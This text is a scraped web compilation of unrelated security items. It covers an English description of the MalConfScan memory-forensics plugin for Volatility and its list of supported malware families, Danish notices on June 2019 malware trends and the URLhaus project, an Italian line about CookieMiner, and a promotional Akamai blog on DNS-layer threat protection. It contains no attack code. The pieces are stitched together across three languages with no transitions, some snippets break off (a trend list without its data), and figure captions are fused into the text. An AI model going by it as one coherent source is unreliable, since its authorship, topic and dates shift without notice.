MalConfScan is a plugin for The Volatility Framework (hereafter “Volatility”), a memory forensic tool. In most cases, malware analysis begins with unpacking the malware to extract configuration. MalConfScan extracts configuration from unpacked executable files loaded on the memory.
MalConfScan can perform the following functions:

malconfscan: Extract configuration of known malware from a memory image
malstrscan: Detect suspicious processes from a memory image and list the string that it refers to
malconfscan

Figure 1 is an example of malconfscan execution. First, a malware-injected process name (Name), the process ID (PID) and the name of the detected malware (Malware Name) are displayed. Malware configuration (Config info) is also displayed.

malconfscan execution result 1Figure 1:malconfscan execution result (Detected “Lavender”, a RedLeaves variant)

malconfscan also decodes encoded strings and displays DGA domains. Figure 2 is the result where malconfscan detected Bebloh. DGA domains are listed following the configuration.

malconfscan execution result 2Figure 2:malconfscan execution result (Detected Bebloh)

As of 30 July 2019, malconfscan is compatible with 25 types of malware. See Appendix for supported malware.

malstrscan

malstrscan detects Process Hollowing on the memory and lists the strings that the process refers to. Although malware configuration is usually encoded, malware decodes it when referring to the information, and this is sometimes left on the memory. This function can pick up such remaining configuration. Figure 3 is an example of malstrscan execution.

malstrscan execution resultsFigure 3:malstrscan execution results

malstrscan lists strings only from the memory space where the PE file is loaded. With ‘-a’ option, it can also list strings in heap and parent memory space.

In closing

malconfscan can be used for malware analysis and memory forensics. We hope that this tool helps incident investigation. We plan to update this tool in the future to make it compatible with many other types of malware.
In the next article, we will install this tool in Cuckoo Sandbox to automatically extract malware configuration.

Shusei Tomonaga
(Translated by Yukako Uchida)

Appendix A Malware Compatible with MalConfScan

Table 1: Compatible malware
Malware
Ursnif
HawkEye Keylogger
Emotet
Lokibot
Smoke Loader
Bebloh
Poison Ivy
AZORult
CobaltStrike
NanoCore RAT
NetWire
AgentTesla
PlugX
FormBook
RedLeaves
NodeRAT
TSCookie
njRAT
TSC_Loader
TrickBot
xxmm
Remcos
Datper
QuasarRAT
Ramnit

Listen over de identificerede malware-varianter i juni måned viser en tilbagevenden af WannaCry- og Tinba-aktiviteter.

Tendensen er stadig at de ti varianter, der identificeres oftest, står for mere end 60 procent af de samlede malware-identifikationer.

Fordelingen over de hyppigst optrædende malware-navne ser således ud for juni 2019:

Sprog
Dansk

Keywords: malwareLæs mere om Top-10 over malware i juni

I ricercatori di sicurezza del team Unit 42 di Palo Alto Networks hanno scoperto il malware per macOS CookieMiner, progettato per “rubare” i cookie associati a siti Web per lo scambio di criptovalute.

There are two types of companies: Those who have been hacked, and those who don’t yet know they have been hacked1

With data breaches frequently making the news and causing panic among network administrators, the above statement by former Cisco boss John Chambers in 2015 certainly doesn’t seem far-fetched. I don’t remember a week in 2018 going by where I wasn’t learning of a data breach and how sophisticated the attack was. Well, except for the time I didn’t have internet access while visiting the Salt Cathedral of Zipaquirá, and I couldn’t understand why. Then, there was the time I had no access on a cruise, but I digress.

The consequences of a data breach are far reaching and include the tangible and intangible. It should come as no surprise that information security is the top concern for CISOs and CIOs of companies. Some of these companies are embracing cloud-native initiatives that have improved organizational agility, reduced products’ time-to-market, and leveled the playing field with respect to computational power. However, they lose visibility into the expanded environment, causing concerns over whether they can adequately secure their cloud environment the way they would their traditional network.

These well-founded concerns are understandable. Traditional network security solutions being used in combating the current cyber-crimewave have only increased the complexity and risk for businesses. Fraudsters have amped up their phishing techniques to deploy sophisticated malware on network devices(human controlled and otherwise) as part of ransomware campaigns, steal sensitive data, or other criminal activities.

It’s far more important to keep an eye on what’s traveling out of the network….Today, malicious actors aren’t interested in scaling the castle wall and capturing the flag. They want to exfiltrate the flag.2

We should always remind ourselves of the statement above made by John Kindervag and add to our focus, ways to prevent any data exfiltration to unauthorized sources in our network. Companies have typically leveraged endpoint solutions in addition to other network elements to protect against malware used for that purpose. However, in combating the cyber-criminals of today, companies need to embrace a defense-in-depth security strategy where all network layers used in accessing data should be secure and this includes the DNS layer. DNS is an often overlooked layer for security and yet, is integral to network functionality. It’s the protocol we use to locate resources on a network. We use it to access our favorite websites, whether news or social media. We use it to access the printers or storage devices, when accessing the security cameras in the data centers and even to send emails. It’s also used by unsuspecting victims to access phishing websites from where malware is downloaded. It is also used by malware to locate control servers on internet. These servers could serve as destinations of data stolen (also using DNS protocol) from digital assets inside companies. These servers could also be used to download keys used to encrypt digital assets as part of ransomware activities.

And so, it’s wise and imperative to secure the DNS layer as part of a defense-in-depth security strategy. As a security control point, DNS layer security offers a proactive way to uniformly and immediately block malicious domains and communications for all of your users, whether they are on or off network. It can also deliver lower latency, fewer broken sites and apps, and improved network performance.

malware.png

These are drivers for the Akamai Enterprise Threat Protector (ETP) solution. ETP is a Secure Internet Gateway solution that is really about advanced threat protection in the cloud for all your users everywhere and using that as your safe onramp to the internet. ETP uses multiple layers of protection — DNS, URL, and inline payload analysis — to provide security with reduced complexity and without impacting performance. Companies simply need to direct their recursive DNS traffic to Enterprise Threat Protector global servers where all requested domains are checked against Akamai’s real-time domain risk scoring threat intelligence. Safe domains are resolved as normal, malicious domains are blocked, and risky domains are sent to a smart selective proxy where the HTTP or HTTPS URLs are inspected to determine if they are malicious. The HTTP and HTTPS payloads from risky domains are then scanned in real-time using multiple advanced malware-detection engines.

ETP improves security defenses. It reduces security complexity and increases the efficiency of security teams. Find out more here.

I marts 2018 blev projektet URLhaus lanceret af abuse.ch, der er en non-profit cyber-sikkerhedsorganisation, baseret i Schweiz.

Formålet med URLhaus er at indsamle URL’er fra sider, der distribuerer malware, hvilket efter ti måneders arbejde har resulteret i, at samarbejdet nu har lukket ikke mindre end 100.000 sider.

256 sikkerhedsforskere, der er spredt over hele verden, rapporterer hver dag til URLhaus om malware-sider, og de hjælper på den måde internetbrugerne mod malware-kampagner.

Sprog
Dansk

Keywords: malwarenon-profitLæs mere om Non-profit samarbejde har nu lukket 100.000 malware-sider